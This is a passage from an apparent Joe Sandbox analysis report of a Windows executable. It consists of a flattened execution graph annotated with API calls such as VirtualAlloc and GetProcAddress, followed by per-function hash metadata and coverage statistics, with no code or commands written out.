7ff65b048982 4532->4538 4534 7ff65b0387d0 VirtualAlloc VirtualFree ExitProcess 4533->4534 4535 7ff65b0489a4 4534->4535 4535->4529 4536 7ff65b048ac4 4537 7ff65b045c23 VirtualAlloc VirtualFree ExitProcess 4536->4537 4537->4535 4538->4535 4538->4536 4539 7ff65b048860 VirtualAlloc VirtualFree ExitProcess 4538->4539 4540 7ff65b048b49 4538->4540 4539->4538 4541 7ff65b0387d0 VirtualAlloc VirtualFree ExitProcess 4540->4541 4541->4535 4543 7ff65b048c52 4542->4543 4544 7ff65b048c6c 4543->4544 4545 7ff65b048d30 4543->4545 4546 7ff65b048880 VirtualAlloc VirtualFree ExitProcess 4544->4546 4558 7ff65b048d19 4544->4558 4547 7ff65b048e8b 4545->4547 4548 7ff65b048e54 4545->4548 4554 7ff65b048e78 4545->4554 4545->4558 4546->4558 4551 7ff65b0387d0 VirtualAlloc VirtualFree ExitProcess 4547->4551 4547->4558 4550 7ff65b043d80 VirtualAlloc VirtualFree ExitProcess 4548->4550 4549 7ff65b048880 VirtualAlloc VirtualFree ExitProcess 4549->4558 4550->4554 4551->4558 4552 7ff65b048c30 VirtualAlloc VirtualFree ExitProcess 4552->4558 4553 7ff65b049544 4553->4529 4555 7ff65b07d703 VirtualAlloc VirtualFree ExitProcess 4554->4555 4556 7ff65b049223 4554->4556 4554->4558 4555->4554 4557 7ff65b0387d0 VirtualAlloc VirtualFree ExitProcess 4556->4557 4556->4558 4557->4558 4558->4549 4558->4552 4558->4553 4560 7ff65b0c8de0 4559->4560 4561 7ff65b0c8e49 4559->4561 4560->4505 4560->4506 4561->4560 4562 7ff65b0387d0 3 API calls 4561->4562 4562->4560 4564 7ff65b080a78 4563->4564 4578 7ff65b08045b 4564->4578 4567 7ff65b045ac9 3 API calls 4568 7ff65b080aee 4567->4568 4586 7ff65b080966 4568->4586 4570 7ff65b080b48 4570->4018 4574 7ff65b04a37a 4573->4574 4575 7ff65b04a2ec 4573->4575 4577 7ff65b04a370 4575->4577 4627 7ff65b04a247 4575->4627 4577->4018 4579 7ff65b080469 4578->4579 4580 7ff65b07d4c1 3 API calls 4579->4580 4581 7ff65b080478 4580->4581 4582 7ff65b080480 4581->4582 4602 7ff65b080427 4581->4602 4582->4567 4582->4570 4585 7ff65b0407fb 3 API calls 4585->4582 4587 7ff65b08097e 4586->4587 4588 7ff65b0809b2 4587->4588 4589 7ff65b0809cf 4587->4589 4590 7ff65b03e95a 3 API calls 4588->4590 4591 7ff65b07dbf3 3 API calls 4589->4591 4592 7ff65b0809ca 4590->4592 4593 7ff65b0809d9 4591->4593 4592->4570 4598 7ff65b0804b2 4592->4598 4593->4592 4594 7ff65b080a21 4593->4594 4595 7ff65b080a3e 4593->4595 4597 7ff65b03e95a 3 API calls 4594->4597 4614 7ff65b049cb8 4595->4614 4597->4592 4599 7ff65b0804c5 4598->4599 4600 7ff65b080090 3 API calls 4599->4600 4601 7ff65b08051f 4599->4601 4600->4601 4601->4570 4603 7ff65b080435 4602->4603 4606 7ff65b080090 4603->4606 4605 7ff65b080455 4605->4582 4605->4585 4608 7ff65b08009f 4606->4608 4607 7ff65b080415 4611 7ff65b080090 VirtualAlloc VirtualFree ExitProcess 4607->4611 4608->4607 4609 7ff65b07d4c1 VirtualAlloc VirtualFree ExitProcess 4608->4609 4610 7ff65b08020e 4608->4610 4613 7ff65b0407fb VirtualAlloc VirtualFree ExitProcess 4608->4613 4609->4608 4610->4605 4612 7ff65b080455 4611->4612 4612->4605 4613->4608 4617 7ff65b0496c0 4614->4617 4618 7ff65b049724 4617->4618 4622 7ff65b049707 4617->4622 4619 7ff65b0387d0 VirtualAlloc VirtualFree ExitProcess 4618->4619 4620 7ff65b049729 4619->4620 4621 7ff65b049768 4623 7ff65b045c23 VirtualAlloc VirtualFree ExitProcess 4621->4623 4622->4620 4622->4621 4624 7ff65b04967e VirtualAlloc VirtualFree ExitProcess 4622->4624 4625 7ff65b049843 4622->4625 4623->4620 4624->4622 4626 7ff65b0387d0 VirtualAlloc VirtualFree ExitProcess 4625->4626 4626->4620 4630 7ff65b049d90 4627->4630 4631 7ff65b049dc4 4630->4631 4632 7ff65b049de1 4630->4632 4634 7ff65b049de6 4631->4634 4635 7ff65b049e25 4631->4635 4637 7ff65b049e9a 4631->4637 4633 7ff65b0387d0 3 API calls 4632->4633 4633->4634 4636 7ff65b045c23 3 API calls 4635->4636 4636->4634 4638 7ff65b0387d0 3 API calls 4637->4638 4638->4634 4642 7ff65b04a720 4639->4642 4643 7ff65b04a76f 4642->4643 4645 7ff65b04a7c9 4643->4645 4646 7ff65b04a390 4643->4646 4645->4024 4647 7ff65b04a3af 4646->4647 4648 7ff65b04a3c1 4646->4648 4647->4643 4648->4647 4649 7ff65b04a510 4648->4649 4650 7ff65b04a4ed 4648->4650 4651 7ff65b04a520 4648->4651 4655 7ff65b04a5e7 4649->4655 4656 7ff65b04a710 4649->4656 4652 7ff65b043d80 3 API calls 4650->4652 4653 7ff65b0387d0 3 API calls 4651->4653 4652->4649 4653->4647 4654 7ff65b04a390 3 API calls 4654->4656 4655->4647 4658 7ff65b0387d0 3 API calls 4655->4658 4656->4654 4657 7ff65b04a7c9 4656->4657 4657->4643 4658->4647 4660 7ff65b038a47 4659->4660 4661 7ff65b0389bf LoadLibraryA 4659->4661 4660->4032 4661->4660 4663 7ff65b033744 4662->4663 4664 7ff65b038b15 4662->4664 4663->4035 4665 7ff65b038b2c GetProcAddress 4664->4665 4665->4664 4666 7ff65b038b63 4665->4666 4666->4663 4667 7ff65b039146 ExitProcess 4666->4667 4668 7ff65b0390d9 GetProcAddress 4666->4668 4667->4663 4668->4663 4668->4666 4922 7ff65b03343a 4923 7ff65b03347d 4922->4923 4923->4922 4924 7ff65b042265 3 API calls 4923->4924 4925 7ff65b0334c5 4923->4925 4924->4925 4926 7ff65b033685 4925->4926 4927 7ff65b042265 3 API calls 4925->4927 4927->4926 4947 7ff65b035260 4948 7ff65b03527b 4947->4948 4950 7ff65b035293 4947->4950 4949 7ff65b03e95a 3 API calls 4948->4949 4949->4950 4957 7ff65b0337e0 4958 7ff65b0337f7 4957->4958 4959 7ff65b033848 4958->4959 4963 7ff65b033986 4958->4963 4964 7ff65b033899 4958->4964 4960 7ff65b03388f 4959->4960 4961 7ff65b033894 4959->4961 4960->4964 4966 7ff65b0339f7 4960->4966 4967 7ff65b038980 LoadLibraryA 4960->4967 4962 7ff65b0387d0 3 API calls 4961->4962 4962->4964 4963->4964 4965 7ff65b0407fb 3 API calls 4963->4965 4965->4964 4968 7ff65b038a80 3 API calls 4966->4968 4967->4966 4969 7ff65b033a4c 4968->4969 5002 7ff65b034ca0 5003 7ff65b034d16 TlsSetValue 5002->5003 5004 7ff65b034dde 5002->5004 5003->5004 4669 7ff65b043d80 4670 7ff65b043dba 4669->4670 4671 7ff65b0383d0 3 API calls 4670->4671 4672 7ff65b043de5 4671->4672 4673 7ff65b043ec4 4672->4673 4674 7ff65b043e14 4672->4674 4726 7ff65b043e8d 4672->4726 4751 7ff65b044c80 4673->4751 4676 7ff65b043e9f 4674->4676 4677 7ff65b043e84 4674->4677 4732 7ff65b0427f0 4676->4732 4680 7ff65b0387d0 3 API calls 4677->4680 4680->4726 4681 7ff65b043fe6 4684 7ff65b044047 4681->4684 4685 7ff65b044472 4681->4685 4682 7ff65b043fcb 4683 7ff65b0387d0 3 API calls 4682->4683 4683->4726 4687 7ff65b044068 4684->4687 4688 7ff65b04406d 4684->4688 4686 7ff65b04449b 4685->4686 4690 7ff65b044496 4685->4690 4691 7ff65b0387d0 3 API calls 4686->4691 4692 7ff65b04416d 4687->4692 4693 7ff65b044185 4687->4693 4689 7ff65b0387d0 3 API calls 4688->4689 4689->4726 4694 7ff65b044683 4690->4694 4695 7ff65b044513 4690->4695 4691->4726 4696 7ff65b0387d0 3 API calls 4692->4696 4697 7ff65b044279 4693->4697 4698 7ff65b0441a9 4693->4698 4703 7ff65b0446a7 4694->4703 4704 7ff65b0446ac 4694->4704 4701 7ff65b0387d0 3 API calls 4695->4701 4695->4726 4696->4726 4699 7ff65b044287 4697->4699 4700 7ff65b0442a5 4697->4700 4705 7ff65b03e95a 3 API calls 4698->4705 4698->4726 4706 7ff65b03e95a 3 API calls 4699->4706 4770 7ff65b042a70 4700->4770 4701->4695 4709 7ff65b044857 4703->4709 4710 7ff65b044744 4703->4710 4708 7ff65b0387d0 3 API calls 4704->4708 4705->4726 4706->4726 4707 7ff65b0442b6 4713 7ff65b044300 4707->4713 4723 7ff65b0442fb 4707->4723 4708->4726 4711 7ff65b044970 4709->4711 4712 7ff65b044865 4709->4712 4716 7ff65b0387d0 3 API calls 4710->4716 4714 7ff65b04499c 4711->4714 4715 7ff65b04497e 4711->4715 4717 7ff65b03e95a 3 API calls 4712->4717 4712->4726 4719 7ff65b0387d0 3 API calls 4713->4719 4720 7ff65b044adb 4714->4720 4721 7ff65b0449aa 4714->4721 4718 7ff65b03e95a 3 API calls 4715->4718 4716->4726 4717->4712 4718->4726 4719->4726 4727 7ff65b044abe 4720->4727 4758 7ff65b043930 4720->4758 4724 7ff65b03e95a 3 API calls 4721->4724 4721->4727 4725 7ff65b03e95a 3 API calls 4723->4725 4723->4726 4724->4727 4725->4726 4727->4726 4728 7ff65b044db9 4727->4728 4729 7ff65b044eb8 4727->4729 4728->4726 4730 7ff65b0387d0 3 API calls 4728->4730 4729->4726 4731 7ff65b0387d0 3 API calls 4729->4731 4730->4726 4731->4726 4733 7ff65b042847 4732->4733 4734 7ff65b04280d 4732->4734 4733->4726 4735 7ff65b0383d0 3 API calls 4734->4735 4736 7ff65b04281c 4735->4736 4737 7ff65b04283d 4736->4737 4738 7ff65b042842 4736->4738 4740 7ff65b0428bb 4737->4740 4741 7ff65b0428b1 4737->4741 4739 7ff65b0387d0 3 API calls 4738->4739 4739->4733 4743 7ff65b042a5e 4740->4743 4744 7ff65b0429d8 4740->4744 4745 7ff65b0429dd 4740->4745 4742 7ff65b0387d0 3 API calls 4741->4742 4742->4733 4747 7ff65b042a22 4744->4747 4748 7ff65b042a12 4744->4748 4746 7ff65b03e95a 3 API calls 4745->4746 4746->4733 4749 7ff65b042a70 3 API calls 4747->4749 4750 7ff65b03e95a 3 API calls 4748->4750 4749->4733 4750->4733 4752 7ff65b044c8a 4751->4752 4753 7ff65b044db9 4752->4753 4754 7ff65b044eb8 4752->4754 4757 7ff65b043f62 4752->4757 4755 7ff65b0387d0 3 API calls 4753->4755 4753->4757 4756 7ff65b0387d0 3 API calls 4754->4756 4754->4757 4755->4757 4756->4757 4757->4681 4757->4682 4759 7ff65b0439ca 4758->4759 4767 7ff65b043a82 4758->4767 4760 7ff65b043a69 4759->4760 4761 7ff65b043a6e 4759->4761 4759->4767 4793 7ff65b043310 4760->4793 4789 7ff65b04315c 4761->4789 4764 7ff65b043a9b 4765 7ff65b043b59 4764->4765 4768 7ff65b043b54 4764->4768 4766 7ff65b0387d0 3 API calls 4765->4766 4765->4767 4766->4767 4767->4727 4768->4767 4769 7ff65b03e95a 3 API calls 4768->4769 4769->4767 4771 7ff65b042aa0 4770->4771 4777 7ff65b042a8c 4770->4777 4772 7ff65b042b1d 4771->4772 4773 7ff65b042b13 4771->4773 4775 7ff65b042b8d 4772->4775 4776 7ff65b042b92 4772->4776 4774 7ff65b0387d0 3 API calls 4773->4774 4774->4777 4778 7ff65b042d1c 4775->4778 4779 7ff65b042db3 4775->4779 4776->4777 4780 7ff65b0387d0 3 API calls 4776->4780 4777->4707 4778->4777 4783 7ff65b0387d0 3 API calls 4778->4783 4781 7ff65b042de8 4779->4781 4782 7ff65b042dd8 4779->4782 4780->4777 4785 7ff65b042f4a 4781->4785 4787 7ff65b042f45 4781->4787 4784 7ff65b03e95a 3 API calls 4782->4784 4783->4778 4784->4777 4786 7ff65b0387d0 3 API calls 4785->4786 4786->4777 4787->4777 4788 7ff65b0387d0 3 API calls 4787->4788 4788->4777 4790 7ff65b043174 4789->4790 4812 7ff65b03e3b0 4790->4812 4792 7ff65b04318a 4792->4767 4794 7ff65b043377 4793->4794 4795 7ff65b0434df 4794->4795 4796 7ff65b0434d5 4794->4796 4810 7ff65b043459 4794->4810 4798 7ff65b04356f 4795->4798 4799 7ff65b043574 4795->4799 4797 7ff65b0387d0 3 API calls 4796->4797 4797->4810 4801 7ff65b0435f9 4798->4801 4802 7ff65b0435ef 4798->4802 4800 7ff65b0387d0 3 API calls 4799->4800 4800->4810 4803 7ff65b04362e 4801->4803 4804 7ff65b04361e 4801->4804 4805 7ff65b0387d0 3 API calls 4802->4805 4807 7ff65b043737 4803->4807 4808 7ff65b04373c 4803->4808 4806 7ff65b03e95a 3 API calls 4804->4806 4805->4810 4806->4810 4807->4810 4811 7ff65b0387d0 3 API calls 4807->4811 4809 7ff65b0387d0 3 API calls 4808->4809 4809->4810 4810->4764 4811->4810 4813 7ff65b03e44e 4812->4813 4815 7ff65b03e71b 4812->4815 4817 7ff65b03e4cd 4813->4817 4818 7ff65b03bfe0 4813->4818 4815->4792 4817->4815 4826 7ff65b03e090 4817->4826 4819 7ff65b03c2a5 4818->4819 4824 7ff65b03c03f 4818->4824 4820 7ff65b03c4d1 4819->4820 4821 7ff65b03c43a 4819->4821 4822 7ff65b03c43f 4819->4822 4832 7ff65b03aff0 4821->4832 4848 7ff65b03bf2f 4822->4848 4824->4817 4827 7ff65b03e35a 4826->4827 4830 7ff65b03e0e6 4826->4830 4828 7ff65b03e0f2 4827->4828 4892 7ff65b03e029 4827->4892 4828->4815 4830->4828 4886 7ff65b03d900 4830->4886 4833 7ff65b03b00e 4832->4833 4834 7ff65b03b37f 4833->4834 4835 7ff65b03b8f7 4833->4835 4841 7ff65b03b37a 4833->4841 4836 7ff65b03b506 4834->4836 4840 7ff65b03b393 4834->4840 4837 7ff65b039e90 VirtualAlloc 4836->4837 4838 7ff65b03b51b 4837->4838 4838->4835 4844 7ff65b03aebf VirtualAlloc 4838->4844 4847 7ff65b03b4f7 4838->4847 4840->4835 4840->4847 4853 7ff65b039e90 4840->4853 4862 7ff65b03aebf 4840->4862 4841->4835 4846 7ff65b03aebf VirtualAlloc 4841->4846 4841->4847 4844->4847 4846->4847 4847->4835 4865 7ff65b03a9ce 4847->4865 4849 7ff65b0393c0 VirtualAlloc 4848->4849 4850 7ff65b03bf42 4849->4850 4851 7ff65b03a9ce VirtualAlloc 4850->4851 4852 7ff65b03bfd6 4851->4852 4852->4824 4854 7ff65b039ec5 4853->4854 4855 7ff65b03a248 4854->4855 4857 7ff65b03a367 4854->4857 4861 7ff65b03a540 4854->4861 4855->4861 4868 7ff65b0393c0 VirtualAlloc 4855->4868 4858 7ff65b03a324 4857->4858 4859 7ff65b0393c0 VirtualAlloc 4857->4859 4858->4861 4870 7ff65b0398d0 4858->4870 4859->4858 4861->4840 4878 7ff65b03aa92 4862->4878 4882 7ff65b03a7c0 4865->4882 4869 7ff65b0393f7 4868->4869 4869->4858 4871 7ff65b0398f1 4870->4871 4873 7ff65b0399ae 4871->4873 4874 7ff65b039550 4871->4874 4873->4861 4875 7ff65b03958e 4874->4875 4876 7ff65b0393c0 VirtualAlloc 4875->4876 4877 7ff65b03967e 4875->4877 4876->4877 4877->4873 4879 7ff65b03ab66 4878->4879 4880 7ff65b03a9ce VirtualAlloc 4879->4880 4881 7ff65b03abc5 4880->4881 4883 7ff65b03a7e8 4882->4883 4884 7ff65b039550 VirtualAlloc 4883->4884 4885 7ff65b03a806 4883->4885 4884->4885 4885->4824 4888 7ff65b03d9a8 4886->4888 4889 7ff65b03d9ef 4886->4889 4887 7ff65b03df30 4888->4889 4891 7ff65b03aa92 VirtualAlloc 4888->4891 4889->4887 4890 7ff65b03aa92 VirtualAlloc 4889->4890 4890->4889 4891->4889 4893 7ff65b03e058 4892->4893 4894 7ff65b03e06c 4892->4894 4898 7ff65b03df4e 4893->4898 4895 7ff65b03d900 VirtualAlloc 4894->4895 4897 7ff65b03e067 4895->4897 4897->4828 4903 7ff65b03d7b0 4898->4903 4900 7ff65b03df90 VirtualFree 4901 7ff65b03e018 ExitProcess 4900->4901 4902 7ff65b03e023 4900->4902 4902->4897 4904 7ff65b03d7c2 4903->4904 4904->4900 4904->4904 4970 7ff65b0350df 4974 7ff65b0350e2 4970->4974 4971 7ff65b035257 4972 7ff65b03e95a 3 API calls 4971->4972 4973 7ff65b035293 4971->4973 4972->4973 4974->4971 4975 7ff65b038980 LoadLibraryA 4974->4975 4976 7ff65b0351bf 4975->4976 4976->4971 4977 7ff65b0351e9 4976->4977 4978 7ff65b038a80 3 API calls 4977->4978 4979 7ff65b035247 4978->4979

                            Control-flow Graph

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2497131956.00007FF65B031000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF65B030000, based on PE: true
                            • Associated: 00000007.00000002.2497095428.00007FF65B030000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000007.00000002.2497352169.00007FF65B20F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000007.00000002.2497391613.00007FF65B21D000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000007.00000002.2497453294.00007FF65B232000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000007.00000002.2497453294.00007FF65B235000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000007.00000002.2497453294.00007FF65B297000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000007.00000002.2497567046.00007FF65B29B000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_7ff65b030000_AA31.jbxd
                            Similarity
                            • API ID: _initterm
                            • String ID: 0
                            • API String ID: 4163712557-4108050209
                            • Opcode ID: d0c91f69a36dc915e8c1dac5c1df33297561d19c6776b9ceb0e3a356a21a41d9
                            • Instruction ID: d015fd7b8217085a5fd0cdbfc6529c1d3dd1895de5b35bbc4cc4604cf38ce92d
                            • Opcode Fuzzy Hash: d0c91f69a36dc915e8c1dac5c1df33297561d19c6776b9ceb0e3a356a21a41d9
                            • Instruction Fuzzy Hash: B751B136E19B4689FB019B56E99477823A1FB4CB84F188436CE0CA77B8CE3CE4448760

                            Control-flow Graph

                            APIs
                            • GetSystemInfo.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,00007FF65B1562FD), ref: 00007FF65B154FEE
                            Memory Dump Source
                            • Source File: 00000007.00000002.2497131956.00007FF65B031000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF65B030000, based on PE: true
                            • Associated: 00000007.00000002.2497095428.00007FF65B030000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000007.00000002.2497352169.00007FF65B20F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000007.00000002.2497391613.00007FF65B21D000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000007.00000002.2497453294.00007FF65B232000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000007.00000002.2497453294.00007FF65B235000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000007.00000002.2497453294.00007FF65B297000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000007.00000002.2497567046.00007FF65B29B000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_7ff65b030000_AA31.jbxd
                            Similarity
                            • API ID: InfoSystem
                            • String ID:
                            • API String ID: 31276548-0
                            • Opcode ID: 4435a1eed049c3fd0450f88751b0f5cfbfedae25248e736f52470c25bd2a7fc0
                            • Instruction ID: b3ab532575c648f356e030e9a85f9b63855c33b85a0dbcc1c1427e4cca07a3a1
                            • Opcode Fuzzy Hash: 4435a1eed049c3fd0450f88751b0f5cfbfedae25248e736f52470c25bd2a7fc0
                            • Instruction Fuzzy Hash: AEF03036639B8486DEA4DB2DE88142EB7A0F78C794F541135EA8E937B8DF2CD010CB00

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 358 7ff65b0393c0-7ff65b0393f1 VirtualAlloc 359 7ff65b0393f7 call 7ff65b0393b1 358->359 360 7ff65b0393fc-7ff65b039487 358->360 359->360 362 7ff65b03948d-7ff65b039513 360->362 363 7ff65b039523 360->363 362->363 364 7ff65b039519-7ff65b039522 362->364
                            APIs
                            Memory Dump Source
                            • Source File: 00000007.00000002.2497131956.00007FF65B031000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF65B030000, based on PE: true
                            • Associated: 00000007.00000002.2497095428.00007FF65B030000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000007.00000002.2497352169.00007FF65B20F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000007.00000002.2497391613.00007FF65B21D000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000007.00000002.2497453294.00007FF65B232000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000007.00000002.2497453294.00007FF65B235000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000007.00000002.2497453294.00007FF65B297000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000007.00000002.2497567046.00007FF65B29B000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_7ff65b030000_AA31.jbxd
                            Similarity
                            • API ID: AllocVirtual
                            • String ID:
                            • API String ID: 4275171209-0
                            • Opcode ID: 590cbdf70923415df278564712c069ad615679b58158710514d8b1ac31f48482
                            • Instruction ID: 32bda435fb9f86296dd3d76811f6bfa9d6e514d8a726b76ef9f11220d3abb9ed
                            • Opcode Fuzzy Hash: 590cbdf70923415df278564712c069ad615679b58158710514d8b1ac31f48482
                            • Instruction Fuzzy Hash: 78314962B7486003AB9C82799C37A7B25829789730B18A73DAA3BD7BF4DD2DD4410704

                            Control-flow Graph

                            APIs
                            Memory Dump Source
                            • Source File: 00000007.00000002.2497131956.00007FF65B031000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF65B030000, based on PE: true
                            • Associated: 00000007.00000002.2497095428.00007FF65B030000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000007.00000002.2497352169.00007FF65B20F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000007.00000002.2497391613.00007FF65B21D000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000007.00000002.2497453294.00007FF65B232000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000007.00000002.2497453294.00007FF65B235000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000007.00000002.2497453294.00007FF65B297000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000007.00000002.2497567046.00007FF65B29B000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_7ff65b030000_AA31.jbxd
                            Similarity
                            • API ID: _ismbbleadmemset
                            • String ID:
                            • API String ID: 108173368-0
                            • Opcode ID: 57671fdf5fd48d660e387b34f2550a08a233dfe26c6519ce1e1df74da0d6ba48
                            • Instruction ID: b3fe14a01cb0062f8612f66e3afb09f07ccbbb7c689a05ea99a463d12f551660
                            • Opcode Fuzzy Hash: 57671fdf5fd48d660e387b34f2550a08a233dfe26c6519ce1e1df74da0d6ba48
                            • Instruction Fuzzy Hash: 76417D26F057599DFB108B65D5613BC3BB0AB09788F484075CE8CA7BA5DE3CD281C720

                            Control-flow Graph

                            APIs
                            Memory Dump Source
                            • Source File: 00000007.00000002.2497131956.00007FF65B031000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF65B030000, based on PE: true
                            • Associated: 00000007.00000002.2497095428.00007FF65B030000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000007.00000002.2497352169.00007FF65B20F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000007.00000002.2497391613.00007FF65B21D000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000007.00000002.2497453294.00007FF65B232000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000007.00000002.2497453294.00007FF65B235000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000007.00000002.2497453294.00007FF65B297000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000007.00000002.2497567046.00007FF65B29B000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_7ff65b030000_AA31.jbxd
                            Similarity
                            • API ID: AllocCreateThreadVirtual
                            • String ID:
                            • API String ID: 3065189322-0
                            • Opcode ID: 1ecd6ee78ea127f867ce216758fd444255d4e149dd627d0958e958b074ace42d
                            • Instruction ID: 3e679a1cec034dccd6ebfd35503a70b466b7e864a5c7cb6473f58839f91cd97b
                            • Opcode Fuzzy Hash: 1ecd6ee78ea127f867ce216758fd444255d4e149dd627d0958e958b074ace42d
                            • Instruction Fuzzy Hash: 84317432A09F85D5DB808F15F94126AB3A4FB88B80F684136EA8D9B734DF7DD059CB40

                            Control-flow Graph

                            APIs
                            Memory Dump Source
                            • Source File: 00000007.00000002.2497131956.00007FF65B031000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF65B030000, based on PE: true
                            • Associated: 00000007.00000002.2497095428.00007FF65B030000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000007.00000002.2497352169.00007FF65B20F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000007.00000002.2497391613.00007FF65B21D000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000007.00000002.2497453294.00007FF65B232000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000007.00000002.2497453294.00007FF65B235000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000007.00000002.2497453294.00007FF65B297000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000007.00000002.2497567046.00007FF65B29B000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_7ff65b030000_AA31.jbxd
                            Similarity
                            • API ID: AllocVirtual
                            • String ID:
                            • API String ID: 4275171209-0
                            • Opcode ID: a0c6ea1e1d0c3704b1dec8672d4d704532c0c620c3fc467061c89ee7592a08bd
                            • Instruction ID: aa914598b4cbe3bfc6f8cfa924af94145839bae976d050d222f4b5c42dc130a8
                            • Opcode Fuzzy Hash: a0c6ea1e1d0c3704b1dec8672d4d704532c0c620c3fc467061c89ee7592a08bd
                            • Instruction Fuzzy Hash: 6E01F622729F8586DBA4CB65F49462EA7E4FB8D794F140535EA8E87B68DF3CC5108B00
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2497131956.00007FF65B031000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF65B030000, based on PE: true
                            • Associated: 00000007.00000002.2497095428.00007FF65B030000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000007.00000002.2497352169.00007FF65B20F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000007.00000002.2497391613.00007FF65B21D000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000007.00000002.2497453294.00007FF65B232000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000007.00000002.2497453294.00007FF65B235000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000007.00000002.2497453294.00007FF65B297000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000007.00000002.2497567046.00007FF65B29B000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_7ff65b030000_AA31.jbxd
                            Similarity
                            • API ID: AddressProc$ExitProcess
                            • String ID: [i2T
                            • API String ID: 2636158824-4214777484
                            • Opcode ID: 1a6331b62f209788087938028dd1075342753dd5ba018f8267dff905bf1da63a
                            • Instruction ID: 728f52ace78654f4e0052084850a0db3d3ce02676d30d70d8c83a0a2e891aceb
                            • Opcode Fuzzy Hash: 1a6331b62f209788087938028dd1075342753dd5ba018f8267dff905bf1da63a
                            • Instruction Fuzzy Hash: 91F19F63B25B514AF758CA76DC516BE2AA397997A4F189334DD2DE7BE8CE3CC0414300

                            Execution Graph

                            Execution Coverage:1%
                            Dynamic/Decrypted Code Coverage:0%
                            Signature Coverage:2.1%
                            Total number of Nodes:1775
                            Total number of Limit Nodes:15
